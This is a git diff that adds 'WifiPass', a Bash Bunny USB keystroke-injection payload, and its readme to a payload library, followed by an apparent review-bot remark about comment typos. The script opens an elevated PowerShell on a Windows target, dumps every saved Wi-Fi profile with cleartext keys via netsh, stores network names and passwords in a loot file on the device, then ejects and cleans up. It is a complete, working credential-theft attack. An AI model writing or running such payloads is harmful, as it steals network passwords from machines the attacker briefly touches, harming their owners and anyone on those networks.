diff --git a/payloads/library/credentials/WifiPass/payload.txt b/payloads/library/credentials/WifiPass/payload.txt
new file mode 100644
index 00000000..bf32b268
--- /dev/null
+++ b/payloads/library/credentials/WifiPass/payload.txt
@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# Title: WifiPass
+# Author: TheRoninRunner
+# Props: illwill
+# Version: 1.0
+# Target: Windows
+#
+# Uses the power of netsh to get a list of all wifi networks and passwords
+# stored on the computer. Windows 7 has some weird formatting issues with the
+# loot file.
+#
+# Tested and working on Windows 7, 8.1, and 10.
+#
+# Goes through the netsh wlan show profiles and runs each with key=clear,
+# saving any networks/keys that aren't open or WEP. For any network that
+# users username and password to log in, you'll get the network name only.
+#
+# Blue --- Setup
+# Yellow --- Using networks.txt to run through the networks
+# White --- Clean up
+# Green --- Done
+#
+
+LED B
+
+#Creates the loot directory
+mkdir -p /root/udisk/loot/WifiPass
+
+#Set up the Bash Bunny and get the networks and computer name
+ATTACKMODE HID STORAGE
+Q DELAY 2000
+Q GUI
+Q DELAY 500
+Q STRING powershell
+Q DELAY 2000
+Q CTRL-SHIFT ENTER
+Q DELAY 2000
+Q LEFTARROW
+Q DELAY 200
+Q ENTER
+Q DELAY 1200
+Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+Q STRING \$compname \= \(\$env\:computername\)
+Q ENTER
+Q DELAY 100
+Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\)
+Q ENTER
+Q DELAY 100
+
+#Types out commands to get the Wifi names and passwords, as well as store them
+LED Y
+Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\)
+Q ENTER
+Q STRING foreach \(\$line in \$lines\) \{
+Q ENTER
+Q STRING \$fields \= \$line -split \'\: \'
+Q ENTER
+Q STRING \$names \= \$fields\[1\]
+Q ENTER
+Q STRING foreach \(\$name in \$names\)\{
+Q ENTER
+Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key
+Q ENTER
+Q STRING \$pass \= \$passwd -split \'\: \'
+Q ENTER
+Q STRING if \(-Not \(\$pass -eq \1\)\) \{
+Q ENTER
+Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name
+Q ENTER
+Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\]
+Q ENTER
+Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n
+Q ENTER
+Q STRING }
+Q ENTER
+Q STRING }
+Q ENTER
+Q STRING }
+Q ENTER
+Q ENTER
+Q DELAY 10000
+
+# Eject the USB Safely and remove networks file
+LED W
+Q STRING \$Eject \= New-Object -comObject Shell.Application
+Q ENTER
+Q DELAY 100
+Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 100
+
+# GTFO
+Q STRING EXIT
+Q ENTER
+#Sync Drive
+sync
+rm -f /root/udisk/loot/WifiPass/networks.txt
+
+#Trap is clean
+LED G
diff --git a/payloads/library/credentials/WifiPass/readme.md b/payloads/library/credentials/WifiPass/readme.md
new file mode 100644
index 00000000..f3162d63
--- /dev/null
+++ b/payloads/library/credentials/WifiPass/readme.md
@@ -0,0 +1,23 @@
+# WifiPass
+* Author: TheRoninRunner
+* Version: Version 1.0
+* Props: illwill
+* Target: Windows
+* Working on Windows 7, 8.1, and 10
+
+## About
+A bit of a fork from WiFiCreds, this uses the same Powershell attack to get wifi networks and their passwords.
+
+WifiPass starts with getting the list of wireless networks saved on the device, storing those to a file. With a little bit of logic, it runs through the networks, only saving out networks that have a Key Content of anything besides 1 (1 being used in the case of WEP and open networks). *NOTE: this will give you network names of university/college networks that pass user accounts to log into them. They won't give you the password with this attack.*
+
+It stores all those in a loot file with the name of the computer. Eject, sync, Ghostbusters reference, then you're good to go.
+
+# No Configuration needed
+
+## Lights
+| LED | Status |
+|---|---|
+| Blue | Creating loot dir and getting network names |
+| Yellow | Looking through networks |
+| White | Eject drive, sync, and remove network file |
+| Green | Finished |
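Review bot: The header comment line `# users username and password to log in, you'll get the network name only.` has a typo that turns the verb into a noun; it should read `# uses a username and password to log in, you'll get the network name only.`. The header sentence `Windows 7 has some weird formatting issues with the loot file` is also too vague for a file header: it would help a maintainer to name the symptom actually observed in the Windows 7 output rather than calling it weird. Both are comment-only changes and leave every `Q` line untouched.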